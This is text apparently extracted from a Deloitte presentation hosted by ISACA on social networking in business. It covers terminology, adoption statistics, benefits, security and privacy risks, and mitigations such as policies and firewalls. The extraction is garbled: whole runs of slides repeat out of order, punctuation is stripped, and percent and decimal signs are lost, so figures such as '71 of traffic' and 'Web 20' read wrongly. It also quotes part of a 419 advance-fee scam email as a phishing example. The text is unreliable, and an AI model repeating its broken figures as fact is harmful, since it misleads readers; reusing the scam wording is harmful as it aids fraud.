ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
